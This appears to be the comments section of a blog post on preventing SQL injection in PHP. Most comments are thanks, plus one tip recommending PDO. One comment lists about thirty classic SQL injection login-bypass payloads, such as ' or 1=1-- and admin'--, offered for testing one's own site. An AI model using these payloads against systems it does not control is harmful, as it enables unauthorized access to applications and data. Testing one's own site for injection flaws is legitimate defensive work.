Comments on: Preventing SQL Injection with PHP

By: vicky patel

vicky patel — Tue, 22 Mar 2011 07:40:37 +0000

‘ or 1′
1=1–
‘ or ”=’
1′or’1′=’1
0′or’0′=’0
admin’–
‘ or 0=0 –
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
Here some sql injection code for you. you can test ur site with these all for sql injection..

or 1=1–
‘ or a=a–
“or “a”=”a
‘)or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1–
hi’ or 1=1–
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”a

Happy Coding

By: shailesh

shailesh — Thu, 19 Aug 2010 06:25:28 +0000

Thanks…..

By: Mukund

Mukund — Fri, 05 Jun 2009 09:05:17 +0000

Thanks
I learned lot from this article

By: Sarah

Sarah — Sat, 23 May 2009 06:37:14 +0000

Very easy to understand.. thanks for the article.
Regards
Sarah

By: Javatechie

Javatechie — Fri, 15 May 2009 06:49:23 +0000

Thnaks.. very helpful!

By: Dharam

Dharam — Wed, 25 Feb 2009 07:13:09 +0000

A great explanation ! ! ! !

By: wookienz

wookienz — Thu, 03 Apr 2008 12:01:03 +0000

great stuff…cheers.

By: voltHeir

voltHeir — Mon, 06 Aug 2007 21:19:58 +0000

why reinvent the wheel? use PDO! then you are truly preventing SQL injection, not simply PHP’s native MySQL compatibility injection.

There are ways around mysql_escape…

By: JHB

JHB — Mon, 06 Aug 2007 20:47:40 +0000

Best explanation ever, you sure know what you’re talking about

By: Jo

Jo — Mon, 06 Aug 2007 10:40:54 +0000

Thanks! Very helpful!